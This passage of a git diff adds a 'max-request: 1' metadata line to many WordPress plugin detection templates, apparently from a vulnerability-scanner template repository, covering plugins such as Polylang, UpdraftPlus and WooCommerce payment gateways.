     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
